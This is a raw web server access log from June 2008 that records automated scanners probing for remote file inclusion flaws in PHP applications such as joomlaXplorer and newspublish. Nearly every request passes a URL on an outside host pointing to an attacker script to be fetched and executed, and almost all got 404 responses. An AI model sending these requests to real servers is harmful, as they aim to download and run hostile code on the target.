82.194.70.164 - - [26/Jun/2008:01:31:08 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.98.71 - - [26/Jun/2008:01:31:48 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.98.71 - - [26/Jun/2008:01:31:49 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.29.73.67 - - [26/Jun/2008:01:33:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.73.67 - - [26/Jun/2008:01:33:25 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
217.148.95.147 - - [26/Jun/2008:01:33:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
217.148.95.147 - - [26/Jun/2008:01:33:26 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
74.6.8.113 - - [26/Jun/2008:01:33:42 -0500] "GET /logs/access_log.1177027200 HTTP/1.0" 200 127660 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.101.24 - - [26/Jun/2008:01:33:44 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.216.249.194 - - [26/Jun/2008:01:33:44 -0500] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
209.216.249.194 - - [26/Jun/2008:01:33:44 -0500] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
87.106.101.24 - - [26/Jun/2008:01:33:44 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.48.67.39 - - [26/Jun/2008:01:34:17 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.48.67.39 - - [26/Jun/2008:01:34:17 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.48.67.39 - - [26/Jun/2008:01:35:52 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.48.67.39 - - [26/Jun/2008:01:35:52 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.10.142.104 - - [26/Jun/2008:01:37:09 -0500] "GET /logs//errors.php/errors.php?error=http://www.lanzarotebodas.net//components/com_zoom/classes/iptc/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.63"
69.10.142.104 - - [26/Jun/2008:01:37:09 -0500] "GET //errors.php/errors.php?error=http://www.lanzarotebodas.net//components/com_zoom/classes/iptc/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.63"
216.118.97.213 - - [26/Jun/2008:01:39:04 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.118.97.213 - - [26/Jun/2008:01:39:04 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
210.48.67.39 - - [26/Jun/2008:01:39:19 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.48.67.39 - - [26/Jun/2008:01:39:19 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.10.6.66 - - [26/Jun/2008:01:40:27 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
195.10.6.66 - - [26/Jun/2008:01:40:27 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.181.105.117 - - [26/Jun/2008:01:44:05 -0500] "GET /logs/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
202.181.105.117 - - [26/Jun/2008:01:44:06 -0500] "GET /db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 290 "-""libwww-perl/5.65"
87.101.4.49 - - [26/Jun/2008:01:44:09 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://thepornhandbook.com/templates/id.txt%20? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
87.101.4.49 - - [26/Jun/2008:01:44:09 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://thepornhandbook.com/templates/id.txt%20? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
72.29.75.39 - - [26/Jun/2008:01:46:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:46:14 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:46:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:46:30 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810